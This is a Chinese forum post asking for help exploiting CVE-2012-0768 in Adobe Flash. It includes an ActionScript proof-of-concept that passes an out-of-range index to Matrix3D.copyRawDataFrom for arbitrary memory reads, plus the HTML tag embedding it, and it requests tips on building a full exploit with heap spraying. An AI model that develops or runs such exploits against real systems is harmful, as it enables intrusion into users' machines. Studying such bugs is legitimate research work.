在看CVE-2012-0768
不知道怎么利用
所以想看看heap spray是不是能搞
但是自己不知道AS语言里面怎么去喷
只好随手拿一个JS的spray页面，在里面写了行代码来调用这个flash。

后来发现打开html页面后，flash一直处于载入中，就是不触发异常，下的断点根本没走。

么有搞过，不懂咋回事，求大牛解释。

最好提示下这个漏洞怎么写exploit。纯研究学习，不做坏事。

flash脚本===============

// Compile with: mxmlc -static-rsls repro_b.as
package {
    import flash.display.*;
    import flash.geom.*;
    import __AS3__.vec.*;

    public class repro_b extends Sprite {

        public function repro_b() {
                        var _local9:* = new Matrix3D();
                        // The second parameter - "index" - is added to the base address of the
                        // empty vector object and used as a read pointer. This allows arbitrary addresses
                        // to be read into the destination matrix.
            var _local10:* = _local9.copyRawDataFrom(new Vector.<Number>(), 0x10000000);
        }
    }
}

html==================
<object type="application/x-shockwave-flash" data="/repro_b.swf" width="100%" height="100%" id="gotoV5Flash" style="visibility: visible; "></object>

[课程]FART 脱壳王！加量不加价！FART作者讲授！